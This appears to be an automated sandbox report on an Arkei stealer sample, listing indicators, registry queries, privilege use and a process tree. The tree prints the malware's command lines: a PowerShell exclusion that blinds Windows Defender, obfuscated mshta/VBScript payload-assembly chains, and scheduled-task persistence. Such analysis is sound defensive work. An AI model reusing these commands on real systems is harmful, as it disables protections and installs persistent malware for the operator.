arkei | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8KowEmYAHlW3pmz2nDd7ZaO1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8KowEmYAHlW3pmz2nDd7ZaO1.exe

Loads dropped DLL 8 IoCs

pid	Process
3392	setup_install.exe
3392	setup_install.exe
3392	setup_install.exe
3392	setup_install.exe
3392	setup_install.exe
2400	Tue1693c6e21a84f1.exe
932	Tue16937a015b8e.tmp
5124	taskkill.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8KowEmYAHlW3pmz2nDd7ZaO1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RJwzwL5KMuWQjArNCsoUoy9D.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
152	ipinfo.io
204	ipinfo.io
238	ipinfo.io
8	ipinfo.io
65	ipinfo.io
67	ip-api.com
69	ipinfo.io
90	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5692	RJwzwL5KMuWQjArNCsoUoy9D.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2044 set thread context of 5052	2044	Tue1607c6ec89.exe	123
PID 3904 set thread context of 2400	3904	Tue1693c6e21a84f1.exe	127

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	uafVdwKyHT5gPne18wT5RnX4.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	uafVdwKyHT5gPne18wT5RnX4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
2852	3392	WerFault.exe	82
5180	5124	WerFault.exe	136
5232	3192	WerFault.exe	115
1264	1304	WerFault.exe	113
5260	3036	WerFault.exe	112
6092	5600	WerFault.exe	141
2608	5648	WerFault.exe	146
2008	5220	WerFault.exe	161
6052	5208	WerFault.exe	160
4652	3076	WerFault.exe	183
1276	884	WerFault.exe	100
976	5720	WerFault.exe	142
5652	4968	WerFault.exe	184
3076	1720	WerFault.exe	162
7008	4488	WerFault.exe	257
7056	4032	WerFault.exe	258
7128	1904	WerFault.exe	261
5956	6268	WerFault.exe	309
2200	6664	WerFault.exe	312

Checks processor information in registry 2 TTPs 21 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4488	schtasks.exe
5276	schtasks.exe
5244	schtasks.exe
5984	schtasks.exe
3308	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2976	taskkill.exe
1588	taskkill.exe
5124	taskkill.exe
7020	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2940	powershell.exe
2940	powershell.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
2852	WerFault.exe
2852	WerFault.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe
3204	Tue16497809b6bd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeAssignPrimaryTokenPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeLockMemoryPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeIncreaseQuotaPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeMachineAccountPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeTcbPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeSecurityPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeTakeOwnershipPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeLoadDriverPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeSystemProfilePrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeSystemtimePrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeProfSingleProcessPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeIncBasePriorityPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeCreatePagefilePrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeCreatePermanentPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeBackupPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeRestorePrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeShutdownPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeDebugPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeAuditPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeSystemEnvironmentPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeChangeNotifyPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeRemoteShutdownPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeUndockPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeSyncAgentPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeEnableDelegationPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeManageVolumePrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeImpersonatePrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: SeCreateGlobalPrivilege	884	Tue165ec2d1de4f1ae98.exe
Token: 31	884	Tue165ec2d1de4f1ae98.exe
Token: 32	884	Tue165ec2d1de4f1ae98.exe
Token: 33	884	Tue165ec2d1de4f1ae98.exe
Token: 34	884	Tue165ec2d1de4f1ae98.exe
Token: 35	884	Tue165ec2d1de4f1ae98.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	4988	Tue1647cedf7bf133.exe
Token: SeDebugPrivilege	4452	Tue160598ce8b05.exe
Token: SeRestorePrivilege	2852	WerFault.exe
Token: SeBackupPrivilege	2852	WerFault.exe
Token: SeDebugPrivilege	2976	taskkill.exe
Token: SeCreateTokenPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeAssignPrimaryTokenPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeLockMemoryPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeIncreaseQuotaPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeMachineAccountPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeTcbPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeSecurityPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeTakeOwnershipPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeLoadDriverPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeSystemProfilePrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeSystemtimePrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeProfSingleProcessPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeIncBasePriorityPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeCreatePagefilePrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeCreatePermanentPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeBackupPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeRestorePrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeShutdownPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeDebugPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeAuditPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeSystemEnvironmentPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeChangeNotifyPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeRemoteShutdownPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe
Token: SeUndockPrivilege	5672	XKpP1q8iPJVAjqogv7ILKaft.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 2424	3156	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	81
PID 3156 wrote to memory of 2424	3156	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	81
PID 3156 wrote to memory of 2424	3156	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	81
PID 2424 wrote to memory of 3392	2424	setup_installer.exe	82
PID 2424 wrote to memory of 3392	2424	setup_installer.exe	82
PID 2424 wrote to memory of 3392	2424	setup_installer.exe	82
PID 3392 wrote to memory of 1540	3392	setup_install.exe	86
PID 3392 wrote to memory of 1540	3392	setup_install.exe	86
PID 3392 wrote to memory of 1540	3392	setup_install.exe	86
PID 1540 wrote to memory of 2940	1540	cmd.exe	87
PID 1540 wrote to memory of 2940	1540	cmd.exe	87
PID 1540 wrote to memory of 2940	1540	cmd.exe	87
PID 3392 wrote to memory of 3108	3392	setup_install.exe	88
PID 3392 wrote to memory of 3108	3392	setup_install.exe	88
PID 3392 wrote to memory of 3108	3392	setup_install.exe	88
PID 3392 wrote to memory of 2720	3392	setup_install.exe	121
PID 3392 wrote to memory of 2720	3392	setup_install.exe	121
PID 3392 wrote to memory of 2720	3392	setup_install.exe	121
PID 3392 wrote to memory of 1492	3392	setup_install.exe	120
PID 3392 wrote to memory of 1492	3392	setup_install.exe	120
PID 3392 wrote to memory of 1492	3392	setup_install.exe	120
PID 3108 wrote to memory of 2044	3108	cmd.exe	89
PID 3108 wrote to memory of 2044	3108	cmd.exe	89
PID 3108 wrote to memory of 2044	3108	cmd.exe	89
PID 3392 wrote to memory of 2168	3392	setup_install.exe	119
PID 3392 wrote to memory of 2168	3392	setup_install.exe	119
PID 3392 wrote to memory of 2168	3392	setup_install.exe	119
PID 3392 wrote to memory of 2236	3392	setup_install.exe	90
PID 3392 wrote to memory of 2236	3392	setup_install.exe	90
PID 3392 wrote to memory of 2236	3392	setup_install.exe	90
PID 3392 wrote to memory of 2508	3392	setup_install.exe	91
PID 3392 wrote to memory of 2508	3392	setup_install.exe	91
PID 3392 wrote to memory of 2508	3392	setup_install.exe	91
PID 3392 wrote to memory of 4484	3392	setup_install.exe	92
PID 3392 wrote to memory of 4484	3392	setup_install.exe	92
PID 3392 wrote to memory of 4484	3392	setup_install.exe	92
PID 3392 wrote to memory of 2704	3392	setup_install.exe	118
PID 3392 wrote to memory of 2704	3392	setup_install.exe	118
PID 3392 wrote to memory of 2704	3392	setup_install.exe	118
PID 3392 wrote to memory of 2804	3392	setup_install.exe	93
PID 3392 wrote to memory of 2804	3392	setup_install.exe	93
PID 3392 wrote to memory of 2804	3392	setup_install.exe	93
PID 2720 wrote to memory of 4452	2720	cmd.exe	117
PID 2720 wrote to memory of 4452	2720	cmd.exe	117
PID 2720 wrote to memory of 4452	2720	cmd.exe	117
PID 3392 wrote to memory of 3188	3392	setup_install.exe	116
PID 3392 wrote to memory of 3188	3392	setup_install.exe	116
PID 3392 wrote to memory of 3188	3392	setup_install.exe	116
PID 1492 wrote to memory of 3204	1492	cmd.exe	94
PID 1492 wrote to memory of 3204	1492	cmd.exe	94
PID 1492 wrote to memory of 3204	1492	cmd.exe	94
PID 3392 wrote to memory of 3716	3392	setup_install.exe	95
PID 3392 wrote to memory of 3716	3392	setup_install.exe	95
PID 3392 wrote to memory of 3716	3392	setup_install.exe	95
PID 3392 wrote to memory of 4360	3392	setup_install.exe	96
PID 3392 wrote to memory of 4360	3392	setup_install.exe	96
PID 3392 wrote to memory of 4360	3392	setup_install.exe	96
PID 3392 wrote to memory of 4960	3392	setup_install.exe	98
PID 3392 wrote to memory of 4960	3392	setup_install.exe	98
PID 3392 wrote to memory of 4960	3392	setup_install.exe	98
PID 3392 wrote to memory of 4388	3392	setup_install.exe	97
PID 3392 wrote to memory of 4388	3392	setup_install.exe	97
PID 3392 wrote to memory of 4388	3392	setup_install.exe	97
PID 2804 wrote to memory of 3192	2804	cmd.exe	115

C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
"C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS879905C3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1607c6ec89.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3108
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1607c6ec89.exe
        
        Tue1607c6ec89.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2044
      - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1607c6ec89.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1607c6ec89.exe
        6⤵
        Executes dropped EXE
        
        PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1693c6e21a84f1.exe
      4⤵
      PID:2236
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe
        
        Tue1693c6e21a84f1.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3904
      - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe
        6⤵
        
        PID:2556
      - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue16752f37c10e89.exe /mixone
      4⤵
      PID:2508
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16752f37c10e89.exe
        
        Tue16752f37c10e89.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1304
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 300
        6⤵
        Program crash
        
        PID:1264
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue16937a015b8e.exe
      4⤵
      PID:4484
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exe
        
        Tue16937a015b8e.exe
        5⤵
        Executes dropped EXE
        
        PID:4064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue169b8ca3fff9b96f8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2804
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue169b8ca3fff9b96f8.exe
        
        Tue169b8ca3fff9b96f8.exe
        5⤵
        Executes dropped EXE
        
        PID:3192
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 240
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue166a21bf15ecf0.exe
      4⤵
      PID:3716
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue166a21bf15ecf0.exe
        
        Tue166a21bf15ecf0.exe
        5⤵
        Executes dropped EXE
        
        PID:1172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue161bd708d12e5.exe
      4⤵
      PID:4360
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe
        
        Tue161bd708d12e5.exe
        5⤵
        Executes dropped EXE
        
        PID:2988
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If """" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        6⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "" =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe" ) do taskkill -F /iM "%~nXE"
        7⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\fkKCS.exe
        
        fkKCS.EXE -P_3FA3g8_0NB
        8⤵
        Executes dropped EXE
        
        PID:2536
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If ""-P_3FA3g8_0NB "" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        9⤵
        Executes dropped EXE
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "-P_3FA3g8_0NB " =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe" ) do taskkill -F /iM "%~nXE"
        10⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscRipt: ClOSE( cREaTEOBjEcT ("wSCript.sheLl").RUN ( "Cmd.eXE /c echo N%TIme%O>VPZp.II & EChO | set /p = ""MZ"" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS " ,0 , TRUe ) )
        9⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F /iM "Tue161bd708d12e5.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1695d07d02bff8ff.exe
      4⤵
      PID:4388
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1695d07d02bff8ff.exe
        
        Tue1695d07d02bff8ff.exe
        5⤵
        Executes dropped EXE
        
        PID:2752
      - C:\Users\Admin\Pictures\Adobe Films\e_irO0_3R6Rf9GgjVi0_oXWl.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\e_irO0_3R6Rf9GgjVi0_oXWl.exe"
        6⤵
        Executes dropped EXE
        
        PID:2428
      - C:\Users\Admin\Pictures\Adobe Films\RJwzwL5KMuWQjArNCsoUoy9D.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RJwzwL5KMuWQjArNCsoUoy9D.exe"
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5692
      - C:\Users\Admin\Pictures\Adobe Films\uafVdwKyHT5gPne18wT5RnX4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\uafVdwKyHT5gPne18wT5RnX4.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5656
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5276
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5244
      - C:\Users\Admin\Pictures\Adobe Films\3GsuTLMCUrLvXLXPiblSrtkE.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3GsuTLMCUrLvXLXPiblSrtkE.exe"
        6⤵
        Executes dropped EXE
        
        PID:5640
      - C:\Users\Admin\Pictures\Adobe Films\rZ7ocUkNDU0jxOPMfMVuMaW7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\rZ7ocUkNDU0jxOPMfMVuMaW7.exe"
        6⤵
        Executes dropped EXE
        
        PID:5632
      - C:\Users\Admin\Pictures\Adobe Films\hBYVkgzfvd8h0hZgEHfZ6oEa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\hBYVkgzfvd8h0hZgEHfZ6oEa.exe"
        6⤵
        Executes dropped EXE
        
        PID:5620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue165ec2d1de4f1ae98.exe
      4⤵
      PID:4960
    - - C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue165ec2d1de4f1ae98.exe
        
        Tue165ec2d1de4f1ae98.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:884
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 1932
        6⤵
        Program crash
        
        PID:1276
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 644
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1604aa7d34a61a5b.exe
      4⤵
      PID:3188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1647cedf7bf133.exe
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue162f02d7b75a1d.exe
      4⤵
      PID:2168
